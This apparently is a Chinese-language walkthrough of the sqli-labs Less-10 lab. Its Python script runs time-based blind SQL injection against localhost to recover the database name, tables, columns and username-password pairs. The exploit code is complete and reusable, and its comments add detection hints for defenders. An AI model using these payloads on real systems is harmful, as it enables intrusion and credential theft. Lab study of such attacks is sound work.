先判断闭合方式,确定为双引号闭合,这个可以跑字典。
进行时间盲注
判断可知数据库的名字长度为8
判断数据库名字
可以知道第一位是s
使用 Burp Suite 进行爆破,发现返回值都是一样的,没有再做过多尝试,改用脚本吧,总比手工要快。
使用脚本来爆破
定义了几个函数,分别是数据库长度,数据库的名字,爆出表名字,爆出列名字,选择字段进行攻击。这几个功能,大同小异,无非就是改改变量的位置和字典的多少,容易上手。
首先是数据库长度:
数据库的名称:
表名字:
Users表的列名字:
数据内容,这里爆的是 username 和 password 两列的数据
这里只爆破了一百位,数据太多了,设置延时三秒实在是太慢了。
最后附上代码:
# coding:utf-8
import requests
import datetime
import time
# 获取数据库名长度
def database_len():
    """Probe the length of the current database name (guesses 1..9) by timing.

    Each request makes the server ``sleep(3)`` only when ``length(database())``
    is not greater than the guess, so the first probe whose whole-second delta
    reaches 1 marks the length. Every candidate URL and every guess is printed
    as the loop runs; the last line prints the guess at which the loop stopped
    (9 if no probe ever slowed down).

    From the defending side the same signal is plain in the access log: a run of
    near-identical requests to one path that differ only in the integer after
    ``length(database())>``, each followed by a multi-second server-side pause.
    """
    base = "http://127.0.0.1/sqli-labs-master/Less-10/"
    for guess in range(1, 10):
        query = "?id=1\" and if(length(database())>%d,0,sleep(3)) -- a" % guess
        # Printed with a trailing %23 (encoded '#'); the request below omits it.
        print(base + query + '%23')
        started = datetime.datetime.now()
        requests.get(base + query)
        # .seconds is the whole-second part of the delta; a 3s sleep clears 1.
        elapsed = (datetime.datetime.now() - started).seconds
        print(guess)
        if elapsed >= 1:
            break
    print('database_len:', guess)
def database_name():
    """Recover the database name one character at a time by timing.

    For positions 1..8 (the length found by database_len) every character of the
    lowercase alphanumeric set is tried; the server sleeps 3s only when
    ``substr(database(), pos, 1)`` equals the guess, and a whole-second delta of
    2 or more counts as a match. A position whose real character is outside the
    set is silently skipped, so the printed name can come out shorter than 8.
    Each probe URL is printed before it is sent.
    """
    base = "http://127.0.0.1/sqli-labs-master/Less-10/"
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz'
    recovered = ''
    for position in range(1, 9):
        for candidate in alphabet:
            query = "?id=1\" and if(substr(database(),%d,1)='%s',sleep(3),1) -- a" % (position, candidate)
            print(base + query)
            started = datetime.datetime.now()
            requests.get(base + query)
            elapsed = (datetime.datetime.now() - started).seconds
            if elapsed >= 2:
                recovered += candidate
                print(recovered)
                break
    print('database_name:', recovered)
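def table_name():
    """Recover the table names of the current schema, one character at a time.

    Walks up to 9 tables (``limit z,1`` over ``information_schema.tables``) and up
    to 8 characters per table, trying the lowercase alphanumeric set at each
    position; a whole-second delay of 2 or more is treated as a hit. Names are
    accumulated into one comma-separated string that is printed after each table
    under the ``table_name:`` label (the earlier label ``database_name:`` was a
    copy-paste leftover and mislabelled the output).

    Queries against ``information_schema`` issued through the web tier are a
    distinctive pattern worth alerting on in database or WAF logs.
    """
    base = "http://127.0.0.1/sqli-labs-master/Less-10/"
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz'
    found = ''
    for table_index in range(0, 9):
        for position in range(1, 9):
            for candidate in alphabet:
                query = ("?id=1\" and if(substr((select table_name from information_schema.tables "
                         "where table_schema=database() limit %d,1),%d,1)='%s',sleep(3),1) -- a"
                         % (table_index, position, candidate))
                started = datetime.datetime.now()
                requests.get(base + query)
                elapsed = (datetime.datetime.now() - started).seconds
                if elapsed >= 2:
                    found += candidate
                    print(found)
                    break
        print('table_name:', found)
        # Separator between consecutive table names.
        found += ','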
def column_name():
    """Recover the column names of the ``users`` table, one character at a time.

    Up to 15 columns (``limit z,1`` over ``information_schema.columns``) and up to
    11 characters each, drawn from the lowercase alphanumeric set; a whole-second
    delay of 2 or more marks a hit. Results accumulate into one comma-separated
    string that is printed after each column.
    """
    base = "http://127.0.0.1/sqli-labs-master/Less-10/"
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz'
    found = ''
    for column_index in range(0, 15):
        for position in range(1, 12):
            for candidate in alphabet:
                query = ("?id=1\" and if(substr((select column_name from information_schema.columns "
                         "where table_name='users' limit %d,1),%d,1)='%s',sleep(3),1) -- a"
                         % (column_index, position, candidate))
                started = datetime.datetime.now()
                requests.get(base + query)
                elapsed = (datetime.datetime.now() - started).seconds
                if elapsed >= 2:
                    found += candidate
                    print(found)
                    break
        print('column_name:', found)
        # Separator between consecutive column names.
        found += ','
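def list_data():
    """Recover the ``username-password`` pairs of the ``users`` table by timing.

    The query concatenates every row with ``group_concat(username,'-',password)``
    and the loop reads positions 1..99 of that string, trying each character of
    the alphanumeric-plus-punctuation set; a whole-second delay of 2 or more
    marks a hit, and a position whose character is outside the set is skipped.
    The summary is printed under the ``data:`` label (the earlier label
    ``column_name:`` was copied from column_name and mislabelled the output).
    """
    base = "http://127.0.0.1/sqli-labs-master/Less-10/"
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz#,@-+=)(*&*/.!+'
    found = ''
    for position in range(1, 100):
        for candidate in alphabet:
            query = ("?id=1\" and if(substr((select group_concat(username,'-',password) from users "
                     "),%d,1)='%s',sleep(3),1) -- a" % (position, candidate))
            started = datetime.datetime.now()
            requests.get(base + query)
            elapsed = (datetime.datetime.now() - started).seconds
            if elapsed >= 2:
                found += candidate
                print(found)
                break
    print('data:', found)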
if __name__ == '__main__':
    # One stage at a time; each later stage relies on what the earlier ones
    # revealed (length -> name -> tables -> columns -> rows), so swap the call
    # here as each finishes: database_len, database_name, table_name,
    # column_name, list_data.
    stage = database_name
    stage()